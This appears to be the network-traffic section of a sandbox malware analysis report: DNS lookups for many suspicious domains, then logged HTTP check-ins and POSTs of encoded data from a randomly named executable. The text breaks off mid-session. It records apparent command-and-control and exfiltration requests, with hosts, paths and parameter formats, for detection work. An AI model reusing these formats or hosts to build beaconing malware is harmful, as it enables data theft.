                                                                                                                                  Oct 24, 2024 08:02:41.279706001 CEST1.1.1.1192.168.2.40x82b1No error (0)www.vasehub.xyz162.213.249.216A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:55.426300049 CEST1.1.1.1192.168.2.40x2d02No error (0)www.coffee-and-blends.info217.160.0.231A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:09.817275047 CEST1.1.1.1192.168.2.40x531No error (0)www.tmstore.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:09.817275047 CEST1.1.1.1192.168.2.40x531No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:09.817275047 CEST1.1.1.1192.168.2.40x531No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:24.461066961 CEST1.1.1.1192.168.2.40xbf40No error (0)www.softillery.infosoftillery.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:24.461066961 CEST1.1.1.1192.168.2.40xbf40No error (0)softillery.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:24.461066961 CEST1.1.1.1192.168.2.40xbf40No error (0)softillery.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:38.776810884 CEST1.1.1.1192.168.2.40xc035Name error (3)www.gemtastic.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:47.183788061 CEST1.1.1.1192.168.2.40x14fcNo error (0)www.nad5.shop156.226.22.233A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:01.195727110 CEST1.1.1.1192.168.2.40x4245No error (0)www.luxe.guru52.20.84.62A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:14.651712894 CEST1.1.1.1192.168.2.40x397cNo error (0)www.digitalbloom.infodigitalbloom.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:14.651712894 CEST1.1.1.1192.168.2.40x397cNo error (0)digitalbloom.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:14.651712894 CEST1.1.1.1192.168.2.40x397cNo error (0)digitalbloom.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:29.255003929 CEST1.1.1.1192.168.2.40x884fNo error (0)www.amitayush.digitalghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:29.255003929 CEST1.1.1.1192.168.2.40x884fNo error (0)ghs.googlehosted.com142.250.186.83A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:43.077860117 CEST1.1.1.1192.168.2.40x5776No error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:56.432395935 CEST1.1.1.1192.168.2.40xeb83No error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:56.432395935 CEST1.1.1.1192.168.2.40xeb83No error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:56.432395935 CEST1.1.1.1192.168.2.40xeb83No error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.specialgift.asia
                                                                                                                                  • www.filelabel.info
                                                                                                                                  • www.multileveltravel.world
                                                                                                                                  • www.40wxd.top
                                                                                                                                  • www.vasehub.xyz
                                                                                                                                  • www.coffee-and-blends.info
                                                                                                                                  • www.tmstore.click
                                                                                                                                  • www.softillery.info
                                                                                                                                  • www.nad5.shop
                                                                                                                                  • www.luxe.guru
                                                                                                                                  • www.digitalbloom.info
                                                                                                                                  • www.amitayush.digital
                                                                                                                                  • www.moritynomxd.xyz
                                                                                                                                  • www.tukaari.shop

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.44974135.156.117.131801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:01:35.048039913 CEST525OUTGET /s7e8/?kf-HBx=Qf5nKOHOS6pOo2hqHNTD4NLxMOybGOQpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneAsTSYMh6rYvgLLbq+jq88smW47nOX2gz0M=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.specialgift.asia
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:01:36.388943911 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:01:36 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 2088
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Status: 404 Not Found
                                                                                                                                  X-Request-Id: f111254e20741f3ff67fadeaa7901cf1
                                                                                                                                  X-Runtime: 0.045698
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 [TRUNCATED]
                                                                                                                                  Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
                                                                                                                                  Oct 24, 2024 08:01:36.388976097 CEST1130INData Raw: 27 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 7b 20 27 61 6e 6f 6e 79 6d 69 7a 65 49 70 27 3a 20 74 72 75 65 20 7d 29 3b 0a 20 20 20 20 2f 2f 20 45 6e 64 20 47 6f 6f 67 6c 65
                                                                                                                                  Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='col2'> <h1> PAGE NOT FOUN


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.4497423.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:01:51.624667883 CEST796OUTPOST /lclg/ HTTP/1.1
                                                                                                                                  Host: www.filelabel.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.filelabel.info
                                                                                                                                  Referer: http://www.filelabel.info/lclg/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 2f 72 32 30 6b 4c 6f 57 52 4c 6d 7a 37 4b 4c 6c 66 47 69 68 6c 70 57 6f 78 67 5a 57 4d 76 77 67 7a 6d 38 39 66 47 75 51 6f 51 66 72 72 69 4d 73 4a 51 45 46 6c 58 7a 45 65 43 68 46 6c 5a 48 37 63 37 35 75 4d 48 4c 38 46 30 75 44 6e 41 73 4f 75 66 4b 66 66 72 6d 57 62 77 61 4a 50 70 77 6a 45 61 55 58 52 67 74 30 6e 5a 39 73 51 59 46 58 4e 53 4f 48 41 76 56 39 35 6c 62 42 72 46 77 66 4d 50 79 74 71 77 50 4e 31 37 77 37 51 6b 49 67 49 73 56 2b 54 58 72 30 67 6e 37 43 39 55 79 4a 43 79 2b 43 67 48 35 69 62 34 47 56 49 67 30 41 55 4d 75 6f 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+TXr0gn7C9UyJCy+CgH5ib4GVIg0AUMuog==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.4497433.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:01:54.184232950 CEST816OUTPOST /lclg/ HTTP/1.1
                                                                                                                                  Host: www.filelabel.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.filelabel.info
                                                                                                                                  Referer: http://www.filelabel.info/lclg/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 63 6a 32 79 33 54 6f 42 68 4c 6c 32 37 4b 4c 76 2f 47 6d 68 6c 6c 57 6f 77 56 43 57 2b 37 77 68 52 75 38 2b 65 47 75 46 6f 51 66 68 4c 69 4a 7a 5a 51 4e 46 6c 61 54 45 62 69 68 46 6c 4e 48 37 64 4c 35 75 64 48 49 39 56 30 57 49 48 41 71 44 4f 66 4b 66 66 72 6d 57 61 55 77 4a 50 78 77 6a 30 4b 55 46 7a 59 71 39 48 5a 2b 72 51 59 46 54 4e 53 4b 48 41 76 6e 39 34 70 39 42 6f 39 77 66 4f 58 79 74 2b 6b 4d 45 31 37 32 30 77 6c 76 76 59 70 6a 7a 52 6d 39 79 53 58 47 4d 75 38 67 4d 45 6a 6b 54 52 6d 75 77 62 63 31 49 50 70 41 4e 58 78 6e 7a 6c 54 47 4b 41 70 53 48 72 70 7a 34 4d 5a 76 4c 39 45 49 70 65 73 3d
                                                                                                                                  Data Ascii: kf-HBx=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+7whRu8+eGuFoQfhLiJzZQNFlaTEbihFlNH7dL5udHI9V0WIHAqDOfKffrmWaUwJPxwj0KUFzYq9HZ+rQYFTNSKHAvn94p9Bo9wfOXyt+kME1720wlvvYpjzRm9ySXGMu8gMEjkTRmuwbc1IPpANXxnzlTGKApSHrpz4MZvL9EIpes=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.4497463.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:01:56.743837118 CEST10898OUTPOST /lclg/ HTTP/1.1
                                                                                                                                  Host: www.filelabel.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.filelabel.info
                                                                                                                                  Referer: http://www.filelabel.info/lclg/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 63 6a 32 79 33 54 6f 42 68 4c 6c 32 37 4b 4c 76 2f 47 6d 68 6c 6c 57 6f 77 56 43 57 2b 44 77 67 6b 36 38 2b 39 2b 75 44 59 51 66 74 72 69 49 7a 5a 52 50 46 6c 79 66 45 62 76 63 46 6d 31 48 34 2b 44 35 36 2f 2f 49 30 56 30 57 56 58 41 76 4f 75 65 58 66 66 37 69 57 62 6b 77 4a 50 78 77 6a 32 43 55 41 52 67 71 37 48 5a 39 73 51 59 4a 58 4e 53 79 48 41 32 53 39 34 38 41 42 59 64 77 52 4f 48 79 6f 4e 4d 4d 50 31 37 30 7a 77 6c 33 76 5a 56 77 7a 52 71 48 79 53 50 6f 4d 74 67 67 4f 41 2b 4c 44 51 47 2b 72 70 4d 34 51 49 56 46 45 47 42 52 30 55 76 59 42 52 4e 50 53 2f 5a 7a 77 4f 6f 36 59 50 51 64 77 4f 75 52 79 35 2f 76 67 38 34 71 68 41 78 63 71 75 48 48 67 56 42 51 44 52 64 67 54 34 52 79 32 50 62 67 38 52 78 48 71 38 65 61 76 52 38 4e 79 48 67 47 6e 67 37 6b 5a 58 57 73 4d 37 73 54 6a 68 38 43 51 44 72 45 36 30 70 47 6a 30 5a 42 59 77 56 62 64 6f 71 6a 4c 51 43 56 34 76 6c 44 51 74 62 43 69 35 2f 36 6e 2f 41 68 2f 31 4b 61 4c 54 5a 5a 67 70 55 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+Dwgk68+9+uDYQftriIzZRPFlyfEbvcFm1H4+D56//I0V0WVXAvOueXff7iWbkwJPxwj2CUARgq7HZ9sQYJXNSyHA2S948ABYdwROHyoNMMP170zwl3vZVwzRqHySPoMtggOA+LDQG+rpM4QIVFEGBR0UvYBRNPS/ZzwOo6YPQdwOuRy5/vg84qhAxcquHHgVBQDRdgT4Ry2Pbg8RxHq8eavR8NyHgGng7kZXWsM7sTjh8CQDrE60pGj0ZBYwVbdoqjLQCV4vlDQtbCi5/6n/Ah/1KaLTZZgpU8LZiE8dCJ3/DwR/KlK87/gDzr3ALQMCUnBjDCz2vkKxD+FZFbDUKtkMlXDDC5y5Gac9xv7qgrFJ/w7oSlXXoHehGHt251MYi7l+qQdiLIOCyMvYgXSrZMY8PPaVH/KodufcIxWQPPe1Oax0AQw8ym9GzERQVEZZsO2Q9AwGJmMlHbTW/ptscpuWPQ32YtF/RLdySmhA1R0KhPbgulRgf/xF4HRXQ0TvxOCHMvhxGXAzH4uRpAjKnkSXJn00ZPyiwPIpZk2fATU4x3cJ1JMFXBV09gcc/MVYYSPqKWQUXtTqrb+tJKwQ178MWmq4XNIxBaj4OfZbonraBMe502CXZp/y/DKdBzkcLiYrTG+08YKzm2RL1Jx9Th0kwEfrXbHfFLBqCLw/hlH1MvV0WzBw+nXYghNoa6Z90OqaNK6kzthHpHkmXoyLkO/BV0DVh17Ug3w7qJW2TSKrnXVIRPhJuYca8E2+6Ic5Q57xnb92vssQ+fmWNBceSDV3oKrdFjUtp1nTacwDNrjDbINsx2erg4HxgXPHaDZcn8dUjo/0HJY7ltXG+rG8xutB3DzIXlLhSQ8PHK+yzs3QQ3lTrA+s61I2QshZgfPG/aCc0BJgaUnKPO2ldkEbEa0dudkUcSrexkmNl+y+ghUjQlb0kxIEIvY+Dh+XME4oGvP [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.4497523.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:01:59.444020987 CEST523OUTGET /lclg/?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.filelabel.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:02:00.058722973 CEST394INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:01:59 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 71 47 4e 51 71 4e 34 32 38 4f 67 42 52 39 69 4b 70 6b 61 64 51 52 79 6b 77 74 2b 48 72 4b 79 2b 69 31 4a 39 70 78 56 66 5a 38 4b 2b 75 77 6d 72 38 38 2b 31 61 74 70 4d 72 61 36 74 6e 49 6c 4c 4f 6a 53 35 49 2b 37 66 65 45 74 66 69 2f 4f 6d 77 76 2f 72 6b 47 45 75 49 77 55 70 5a 6f 58 62 42 39 4c 7a 4d 70 59 5a 49 36 52 36 6c 48 37 6a 44 44 73 44 37 6a 59 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.4498083.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:13.601144075 CEST820OUTPOST /ou1g/ HTTP/1.1
                                                                                                                                  Host: www.multileveltravel.world
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.multileveltravel.world
                                                                                                                                  Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 2b 64 51 6f 70 4a 4a 67 59 73 6d 76 50 56 62 43 62 38 67 4e 53 35 49 78 2f 73 32 59 32 6c 37 31 31 58 2b 6d 4f 72 65 68 61 58 55 66 68 47 6c 67 78 74 34 57 45 41 45 79 4e 62 63 42 73 66 6e 6f 73 62 41 48 72 35 59 37 73 44 71 64 58 45 72 69 68 59 45 7a 43 75 45 34 51 4d 76 36 62 30 62 68 32 44 2b 56 79 6d 79 77 39 79 68 7a 6d 4c 55 6d 47 46 68 66 72 55 67 78 75 58 41 69 6e 36 4f 78 34 4d 52 42 6c 52 73 47 56 6f 6d 59 61 54 73 50 54 68 45 71 32 51 45 33 2b 56 69 4c 4b 34 63 6c 49 47 46 58 53 37 2b 45 6e 55 38 77 69 43 33 66 31 62 34 64 78 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=k4neGU5Lr/HE+dQopJJgYsmvPVbCb8gNS5Ix/s2Y2l711X+mOrehaXUfhGlgxt4WEAEyNbcBsfnosbAHr5Y7sDqdXErihYEzCuE4QMv6b0bh2D+Vymyw9yhzmLUmGFhfrUgxuXAin6Ox4MRBlRsGVomYaTsPThEq2QE3+ViLK4clIGFXS7+EnU8wiC3f1b4dxg==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.4498243.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:16.141700983 CEST840OUTPOST /ou1g/ HTTP/1.1
                                                                                                                                  Host: www.multileveltravel.world
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.multileveltravel.world
                                                                                                                                  Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 38 39 67 6f 76 72 68 67 4e 38 6d 73 46 31 62 43 4a 38 67 4a 53 35 55 78 2f 74 79 49 33 54 54 31 31 31 6d 6d 50 70 32 68 62 58 55 66 70 6d 6c 76 38 4e 34 64 45 41 4a 53 4e 61 67 42 73 66 7a 6f 73 62 77 48 6f 4b 77 34 74 54 71 66 4d 30 72 73 38 6f 45 7a 43 75 45 34 51 4d 72 63 62 33 72 68 32 7a 4f 56 7a 45 4b 7a 30 53 68 77 6c 4c 55 6d 43 46 68 54 72 55 67 54 75 55 46 31 6e 34 47 78 34 4e 68 42 6b 41 73 46 4d 59 6d 65 45 54 73 59 54 41 46 63 2b 6a 4a 62 7a 6a 37 70 4c 49 63 6e 41 67 55 4e 44 4b 66 54 31 55 59 44 2f 46 2b 72 34 59 46 55 71 67 44 47 4a 7a 6d 66 31 5a 51 45 30 68 4f 43 74 4b 47 33 55 2b 59 3d
                                                                                                                                  Data Ascii: kf-HBx=k4neGU5Lr/HE89govrhgN8msF1bCJ8gJS5Ux/tyI3TT111mmPp2hbXUfpmlv8N4dEAJSNagBsfzosbwHoKw4tTqfM0rs8oEzCuE4QMrcb3rh2zOVzEKz0ShwlLUmCFhTrUgTuUF1n4Gx4NhBkAsFMYmeETsYTAFc+jJbzj7pLIcnAgUNDKfT1UYD/F+r4YFUqgDGJzmf1ZQE0hOCtKG3U+Y=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.4498403.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:18.692248106 CEST10922OUTPOST /ou1g/ HTTP/1.1
                                                                                                                                  Host: www.multileveltravel.world
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.multileveltravel.world
                                                                                                                                  Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
